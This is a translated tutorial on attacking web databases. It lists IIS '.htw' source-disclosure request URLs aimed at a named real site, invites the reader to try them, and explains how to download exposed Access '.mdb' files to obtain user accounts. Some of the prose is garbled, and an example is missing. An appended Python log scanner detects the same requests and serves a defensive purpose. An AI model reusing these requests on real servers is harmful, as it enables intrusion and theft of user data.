A typical Web server uses a database to store information, and almost every Web site uses a database. There are two possibilities. One is to use a small database, such as Access, which is typically stored locally. The other is to use a large database, such as SQL Server or Oracle, which is typically placed on another machine and then accessed through ODBC. Because pages often need to query a variety of information, modify user information and perform other operations, they are in essence dealing with the database. This gives illegal users a chance to take advantage of them.

Attacks on the local database.

One way to attack a local database is to download the database; you can then open it to get internal users and accounts, and other useful information. Take "Lotus will" as an example: scanning showed that www.suilian.net is on a virtual host running Windows NT + IIS 4.0. For the scanner you can use Twwwscan or anything else; the functionality is similar. If you can see the ASP source code when you attack IIS, the likelihood of success is great. Testing showed that the site has a source code exposure vulnerability ... You can try it:

http://www.suilian.net/null.htw?ciwebhitsfile=/maillist.asp%20&cirestriction=none&cihilitetype=full
http://www.suilian.net/null.htw?ciwebhitsfile=/index.asp%20&cirestriction=none&cihilitetype=full
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/detnew.asp%20&cirestriction=none&cihilitetype=full
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/detail.asp%20&cirestriction=none&cihilitetype=full
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/topic4.asp%20&cirestriction=none&cihilitetype=full
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/titlefrm.asp%20&cirestriction=none&cihilitetype=full
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/titlenew.asp%20&cirestriction=none&cihilitetype=full

What did you see?
Of course, there are a number of source code leak vulnerabilities; they are not listed here, and you can look them up in the bug manual. Now you can see the ASP source code. If you are not familiar with ASP, I will introduce it briefly (in fact, Allison is not familiar with it either). ASP is embedded between. The code is typically written in VBScript or JavaScript. Look at this example using VBScript:

This is typical code that connects to a database. The steps are: establish the Connection object, set the database path, open the database, set up the Record object, and fetch the records. From this we learn the type, name and path of the database, which is in the current directory. We can also learn the table names and field names of the database. Experienced programmers typically do not place database names directly in the code, but instead set up data sources in ODBC to increase security.

You then find that there are databases such as:

D:\s\suilian\chat\news.mdb
D:\s\suilian\topic22.mdb

You just use

http://www.suilian.net/chat/news.mdb
http://www.suilian.net/topic22.mdb

and you can download them ...

Responsible Editor: Zhao Zhaoyi#51cto.com TEL: (010) 68476636-8001

Original text: Talking about the attack of the database
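From the defender's side, the two request patterns described above (a .htw request whose ciwebhitsfile parameter points at a script, and a direct request for an .mdb file) can be found in the Web server's W3C extended logs. The following is an added example, not code from the original article; the sample log lines, addresses and finding labels are constructed for illustration.

```python
"""Flag the two request patterns described above in W3C extended (IIS) logs."""
from urllib.parse import parse_qs, unquote

# Constructed sample log (documentation addresses; not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-05-01 10:00:01 192.0.2.10 GET /index.asp - 200
2000-05-01 10:00:05 192.0.2.66 GET /null.htw CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full 200
2000-05-01 10:00:09 192.0.2.66 GET /chat/news.mdb - 200
2000-05-01 10:00:12 192.0.2.66 GET /backup/old.MDB - 404
2000-05-01 10:00:20 192.0.2.10 GET /search.htw CiWebHitsFile=/docs/readme.htm&CiRestriction=iis 200
"""

SCRIPT_EXTS = (".asp", ".asa", ".inc")  # server-side source that must never be returned raw
DB_EXTS = (".mdb",)                      # file-based databases stored under the web root


def classify(stem, query, status):
    """Return a finding label for one request, or None if it looks benign."""
    stem = unquote(stem).lower()
    if stem.endswith(".htw"):
        # Parameter names are matched case-insensitively; the trailing %20
        # seen in the article's URLs decodes to a space and is stripped.
        params = {k.lower(): v[0] for k, v in parse_qs(query).items()}
        target = params.get("ciwebhitsfile", "").strip().lower()
        if target.endswith(SCRIPT_EXTS):
            return "webhits-source-disclosure"
    if stem.endswith(DB_EXTS):
        # A 200 means the database file was actually served to the client.
        return "database-downloaded" if status == "200" else "database-probe"
    return None


def scan(log_text):
    """Yield (client_ip, uri_stem, finding) for every flagged log line."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            finding = classify(row.get("cs-uri-stem", ""),
                               row.get("cs-uri-query", "-"),
                               row.get("sc-status", ""))
            if finding:
                yield row.get("c-ip"), row.get("cs-uri-stem"), finding


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A "database-downloaded" finding means the file left the server, so the accounts stored in it should be treated as exposed and the database moved outside the Web root.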